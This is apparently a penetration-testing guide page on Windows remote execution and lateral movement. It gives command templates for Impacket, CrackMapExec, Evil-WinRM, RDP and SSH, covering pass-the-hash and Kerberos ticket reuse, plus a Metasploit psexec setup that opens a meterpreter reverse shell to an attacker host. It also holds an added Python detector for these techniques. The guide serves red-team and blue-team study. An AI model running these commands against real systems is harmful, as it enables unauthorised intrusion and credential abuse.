This guide is currently under development, and I greatly welcome any suggestions or feedback at reaper.gitbook@gmail.com

Remote Execution Techniques

Windows Remote Execution Services

Service Purpose: Various Windows services enable remote command execution for administrative purposes, which can be abused for lateral movement.

Remote Execution Methods

PSExec-style Execution

Using Impacket PSExec

# SMB-based remote execution
python3 psexec.py <domain>/<username>:<password>@<target-IP>
python3 psexec.py -hashes :<NTLM-hash> <domain>/<username>@<target-IP>

# Kerberos authentication
export KRB5CCNAME=<ticket.ccache>
python3 psexec.py <domain>/<username>@<target-IP> -k -no-pass

Using Metasploit PSExec

use exploit/windows/smb/psexec
set RHOSTS <target-IP>
set SMBUser <username>
set SMBPass <password>
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST <attacker-IP>
run

WMI-based Execution

Using Impacket WMIExec

# WMI remote execution (installs no service on the target, unlike psexec; the command still appears as a process spawned by WmiPrvSE.exe)
python3 wmiexec.py <domain>/<username>:<password>@<target-IP>
python3 wmiexec.py -hashes :<NTLM-hash> <domain>/<username>@<target-IP>

# Without a trailing command, wmiexec.py drops into a semi-interactive shell
python3 wmiexec.py <domain>/<username>:<password>@<target-IP>

Using CrackMapExec WMI

# WMI command execution
crackmapexec wmi <target-IP> -u '<username>' -p '<password>' -x "whoami"
crackmapexec wmi <target-IP> -u '<username>' -H <NTLM-hash> -x "powershell -enc <base64-command>"

DCOM-based Execution

Using Impacket DCOMExec

# DCOM remote execution
python3 dcomexec.py <domain>/<username>:<password>@<target-IP>
python3 dcomexec.py -hashes :<NTLM-hash> <domain>/<username>@<target-IP>

# Specify DCOM object
python3 dcomexec.py <domain>/<username>:<password>@<target-IP> -object MMC20

WinRM-based Execution

Using Evil-WinRM

# Windows Remote Management
evil-winrm -i <target-IP> -u <username> -p <password>
evil-winrm -i <target-IP> -u <username> -H <NTLM-hash>

# File upload/download capabilities
upload <local-file> <remote-path>
download <remote-file> <local-path>

Using CrackMapExec WinRM

# WinRM authentication testing
crackmapexec winrm <target-IP> -u '<username>' -p '<password>'
crackmapexec winrm <target-IP> -u '<username>' -H <NTLM-hash>
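Each of the methods above runs the remote command under a characteristic host process on the target (WmiPrvSE.exe for WMI, mmc.exe for the MMC20 DCOM object, wsmprovhost.exe for WinRM, services.exe starting a dropped service binary for PSExec-style tools). The following Python is an added detection example, not part of the original guide: it classifies constructed Sysmon-style process-creation records against those patterns; the field names and sample events are assumptions made for the example.

```python
from dataclasses import dataclass
from pathlib import PureWindowsPath
from typing import List, Optional, Tuple
@dataclass
class ProcEvent:  # Sysmon Event ID 1 style fields: Image, ParentImage, CommandLine
    host: str
    image: str
    parent_image: str
    command_line: str

# Service host process that spawns the shell for each technique on this page.
PARENT_TO_TECHNIQUE = {
    "wmiprvse.exe": "WMI (wmiexec / crackmapexec wmi)",
    "mmc.exe": "DCOM MMC20.Application (dcomexec -object MMC20)",
    "wsmprovhost.exe": "WinRM (evil-winrm / crackmapexec winrm)",
}
SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe"}
def _name(path: str) -> str:
    return PureWindowsPath(path).name.lower()
def classify(ev: ProcEvent) -> Optional[str]:
    """Return a technique label when the event matches a remote-execution pattern."""
    parent, child = _name(ev.parent_image), _name(ev.image)
    # wmiexec.py redirects command output to a "__<timestamp>" file on ADMIN$; that
    # path in the command line identifies it even when the parent is not WmiPrvSE.exe.
    if "admin$\\__" in ev.command_line.lower():
        return PARENT_TO_TECHNIQUE["wmiprvse.exe"]
    if parent in PARENT_TO_TECHNIQUE and child in SHELLS:
        return PARENT_TO_TECHNIQUE[parent]
    # PSExec-style: services.exe starts PSEXESVC or a service binary dropped straight
    # into ADMIN$ (C:\Windows). Heuristic: legitimate services rarely run from there.
    if parent == "services.exe":
        image_dir = str(PureWindowsPath(ev.image).parent).lower()
        if child == "psexesvc.exe" or image_dir == "c:\\windows":
            return "PSExec-style service (psexec.py / Metasploit psexec)"
    return None
def scan(events: List[ProcEvent]) -> List[Tuple[str, str]]:
    """Return (host, technique) for every event that classify() flags."""
    return [(ev.host, label) for ev in events if (label := classify(ev))]

# Constructed sample events, not real telemetry.
SAMPLE_EVENTS = [
    ProcEvent("ws01", r"C:\Windows\System32\cmd.exe", r"C:\Windows\System32\wbem\WmiPrvSE.exe",
              r"cmd.exe /Q /c whoami 1> \\127.0.0.1\ADMIN$\__1700000000.12 2>&1"),
    ProcEvent("ws01", r"C:\Windows\System32\cmd.exe", r"C:\Windows\System32\mmc.exe", "cmd.exe /c hostname"),
    ProcEvent("srv02", r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r"C:\Windows\System32\wsmprovhost.exe", "powershell.exe -NoProfile"),
    ProcEvent("srv02", r"C:\Windows\AbCdEfGh.exe", r"C:\Windows\System32\services.exe", r"C:\Windows\AbCdEfGh.exe"),
    ProcEvent("ws03", r"C:\Windows\System32\svchost.exe", r"C:\Windows\System32\services.exe", "svchost.exe -k netsvcs"),
]
```

The services.exe rule is a coarse heuristic: tune the directory check (and add an allow-list) to the software deployed in your environment before using it for alerting.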

Service-Specific Remote Execution

RDP-based Access

# Remote Desktop Protocol
rdesktop <target-IP> -u <username> -p <password>
xfreerdp /v:<target-IP> /u:<username> /p:<password>

# RDP with pass-the-hash (requires specific tools)
# Note: Standard RDP doesn't support PtH directly

SSH-based Access (Windows OpenSSH)

# If OpenSSH is installed on Windows target
ssh <username>@<target-IP>
scp <file> <username>@<target-IP>:/path/
